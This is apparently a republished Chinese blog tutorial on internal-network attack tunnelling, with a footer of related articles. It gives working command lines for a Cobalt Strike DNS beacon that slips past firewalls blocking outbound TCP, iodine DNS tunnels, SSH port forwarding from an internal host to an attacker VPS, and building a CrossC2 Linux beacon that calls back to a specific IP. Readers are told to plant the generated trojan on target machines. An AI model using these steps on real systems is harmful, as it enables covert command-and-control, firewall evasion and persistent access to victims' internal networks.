内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

这篇具有很好参考价值的文章主要介绍了内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机

一、DNS隧道技术

DNS简介:DNS协议为应用层协议,区域传输时用tcp协议,域名解析时用udp协议

cs上线主机,安全,ssh,linux

###通过DNS隧道绕过防火墙,实现CS上线

实验背景:靶机防火墙封禁出站TCP协议

1、判断出网协议,若果可以ping通,可以利用ICMP协议隧道(之前文章有利用详情)

2、判断是否可以使用DNS协议搭建隧道:nslookup(nslookup baidu.com)

cs上线主机,安全,ssh,linux

cs上线主机,安全,ssh,linux

3、在自己的域名服务中添加NS记录(将子域名指定其他DNS服务器解析)和A(将一个域名指定为IPV4地址)记录,最好添加两条

www.dafei6.cn 解析结果 8.130.119.xx

ns1.dafei6.cn 解析结果为 www.dafei6.cn

ns2.dafei6.cn 解析结果为 www.dafei6.cn

cs上线主机,安全,ssh,linux

4、VPS防火墙(安全组)开放DUP端口53,

注意:DNS paylod默认使用53端口,所以一定要把vps的53端口kill掉,端口占用是不会上线的。

查看53端口是否占用,lsof -i:53

cs上线主机,安全,ssh,linux

cs上线主机,安全,ssh,linux

5、启动CS,创建DNS Beacon,Payload设置DNS地址为ns1.dafei6.cn、ns2.dafei6.cn,StagerDNS地址设置为www.dafei6.cn,生成后门

cs上线主机,安全,ssh,linux

5、靶机运行木马,CS实现上线,会话交互输入mode dns-txt,即可上线

cs上线主机,安全,ssh,linux

###通过DNS隧道绕过防火墙保持与靶机(内网)的通信

实验背景:靶机防火墙封禁出站TCP协议,获取到执行cmd的权限

实验工具:iodined(https://github.com/yarrick/iodine)

1、在服务器中执行 iodined -f -c -P dafei 192.168.0.1 ns1.dafei6.cn -DD //设置密码dafei并创建虚拟IP及绑定域名指向ns1.dafei6.cn,服务器会新建一个IP为192.168.0.1的网卡

    iodined -f -c -P Micr067 192.168.0.1 vpn.abc.com -DD

    -f:在前台运行

    -c:禁止检查所有传入请求的客户端IP地址。

    -P:客户端和服务端之间用于验证身份的密码。

    -D:指定调试级别,-DD指第二级。“D”的数量随级别增加。

    这里的192.168.0.1是自定义的局域网虚拟IP地址

apt-get update

apt install iodine

cs上线主机,安全,ssh,linux

2、在靶机CMD中执行 iodine.exe -f -M 200 -P dafei ns1.dafei6.cn //靶机会新建一个IP为192.168.0.X/24的C段网卡,实现与服务器的同网段通信

    iodine -f -P Micr067 vpn.abc.ltd -M 200

    -r:iodine有时会自动将DNS隧道切换为UDP隧道,该参数的作用是强制在任何情况下使用DNS隧道

    -M:指定上行主机的大小。

    -m:调节最大下行分片的大小。

    -T:指定DNS请求类型TYPE,可选项有NULL、PRIVATE、TXT、SRV、CNAME、MX、A。

    -O:指定数据编码规范。

    -L:指定是否开启懒惰模式,默认开启。

    -I:指定两个请求之间的时间间隔。

cs上线主机,安全,ssh,linux

cs上线主机,安全,ssh,linux

二、SSH隧道技术(利用SSH协议将同网段的内网主机端口服务转发到远程vps)

cs上线主机,安全,ssh,linux

1、通讯:

由于SSH协议存在于Linux系统,跳板机必须Linux

开启ssh协议登录:

vi /etc/ssh/sshd_config

PermitRootLogin yes

PasswordAuthentication yes

/etc/init.d/ssh start

/etc/init.d/ssh restart

靶机封禁出站,采取正向入站,将内网主机的端口服务封装到本地,实现端口的转发

ssh -CfNg -L 1234:192.168.131.134:80 root@192.168.131.128 //将内网主机192.168.131.134的80端口转发至本地192.168.131.128的8877端口

curl http://127.0.0.1:8877

cs上线主机,安全,ssh,linux

靶机封禁入站,采取反向出站

在跳板机192.168.131.128中输入:ssh -CfNg -R 9988:192.168.131.134:80 root@8.130.119.137 //将内网主机192.168.131.134的80端口转发至8.130.119.137的9988端口

在远程VPS(8.130.119.137)中访问:curl http://127.0.0.1:9988

cs上线主机,安全,ssh,linux

cs上线主机,安全,ssh,linux

三、CS上线linux系统(利用CrossC2.cna)

1、首先下载CrossC2(https://github.com/gloxec/CrossC2)目前版本只支持反向的https和正向的tcp

将对应服务器系统类型的相关插件和文件传入CS根目录,并赋予一定的执行权限

cs上线主机,安全,ssh,linux

cs上线主机,安全,ssh,linux

cs上线主机,安全,ssh,linux

2、新建监听器,生成木马

cs上线主机,安全,ssh,linux

cs上线主机,安全,ssh,linux

3、根据CS的事件日志,生成木马

/root/CS4.5 /genCrossC2.Linux 8.130.119.137 5566 ./.cobaltstrike.beacon_keys null Linux x64 t_cc2.out

cs上线主机,安全,ssh,linux

4、上传木马文件,添加执行权限

cs上线主机,安全,ssh,linux

cs上线主机,安全,ssh,linux文章来源地址https://www.toymoban.com/news/detail-782002.html

到了这里,关于内网安全-隧道技术&SSH实现通信&DNS上线与通信&CS上线Linux主机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【内网安全-隧道搭建】内网穿透_Nps配置、上线

    目录 Nps(自定义上线) 1、简述: 2、工具的配置:  1、准备: 2、服务端配置: 3、客户端配置 3、工具的使用: 1、web管理界面 2、客户端上线  3、msf后门 1) nps: 是一款轻量级、高性能、功能强大的内网穿透代理服务器 2) 功能: 目前支持 tcp、udp 流量转发,可支持任何

    2024年02月03日
    浏览(38)
  • 【内网安全-隧道搭建】内网穿透_Frp上线、测试

    目录 Frp(简易上线) 1、简述: 2、工具: 3、使用: 1、准备: 2、服务端(公网): 2、客户端(内网): 3、测试方法: 4、生成后门木马监听: 1) Frp (Fast Reverse Proxy) 是一个免费开源的用于内网穿透的 反向 代理应用,它支持 TCP、UDP 协议 , 也为 HTTP、HTTPS 协议提供了额

    2023年04月08日
    浏览(40)
  • 内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok

    目录 环境介绍 内网穿透-Ngrok-入门-上线--tcp协议 内网穿透-Frp-简易型-上线 内网穿透-Nps-自定义-上线  环境介绍 实验目的:让msf上线外网,通常情况下,内网可以访问外网,但是外网无法访问到内网,所以外网的木马通常情况下不可能链接到内网。 红色的云作为跳板机,通过

    2023年04月08日
    浏览(96)
  • 内网隧道代理技术(二十一)之 CS工具自带中转技术上线不出网机器

    如图A区域存在一台中转机器,这台机器可以出网,这种是最常见的情况。我们在渗透测试的过程中经常是拿下一台边缘机器,其有多块网卡,边缘机器可以访问内网机器,内网机器都不出网。这种情况下拿这个边缘机器做中转,就可以使用CS工具自带上线不出网机器 网络拓扑

    2024年02月10日
    浏览(31)
  • 【内网安全】 域防火墙&入站出站规则&不出网隧道上线&组策略对象同步

    解决网络不通讯问题 代理与隧道技术: 代理: 流量转发至跳板机,可以是服务器或者肉鸡,最主要的特征是,无论代理后面挂了几个设备,代理对外只表现为一个设备。 隧道: 是通过特定的通讯方法,直接找到这个目标 reverse_tcp:反向 后门主动连接自己服务器 目标防火墙

    2024年02月04日
    浏览(39)
  • 网络安全内网渗透之DNS隧道实验--dnscat2直连模式

    目录 一、DNS隧道攻击原理 二、DNS隧道工具 (一)安装dnscat2服务端 (二)启动服务器端 (三)在目标机器上安装客户端 (四)反弹shell         在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。入股哦在互联网上

    2024年02月06日
    浏览(50)
  • 内网安全:初探隧道技术

    目录 防火墙必备知识 域控-防火墙组策略对象同步 域控 - 防火墙组策略不出网上线 MSF上线 CS - ICMP上线 注意:隧道技术是后渗透手段,是在已经取得权限后的手段 域控-组策略同步 学习防火墙的目标是知道了解防火墙的一些常见配置对内网渗透的影响,并不需要像运维一样全

    2024年02月07日
    浏览(43)
  • 内网安全:隧道技术详解

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后门执行上线 隧道技术 - SMB协议 SMB协议介绍 实战二:SMB协议搭建隧道 正向连接 - 拿下

    2024年02月08日
    浏览(39)
  • 70内网安全-域横向内网漫游Socks代理隧道技术(下)

              这节课解决代理的问题, 他是内网里面的穿透技术,隧道主要安全设备和流量监控的拦截问题,我们在做渗透的时候需要回显数据或者一些重要的信息,走的协议不一样,tcp/ip有七层, 在不同层里面有不同的协议,有一些协议会受到防火墙,过滤设备和流量检测

    2024年02月03日
    浏览(44)
  • p70 内网安全-域横向内网漫游 Socks 代理隧道技术(NPS、FRP、CFS 三层内网漫游)

    数据来源         本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。   ​ 必要基础知识点: 内外网简单知识 内网 1 和内网 2 通信问题 正向反向协议通信连接问题 内网穿透代理隧道

    2024年02月05日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包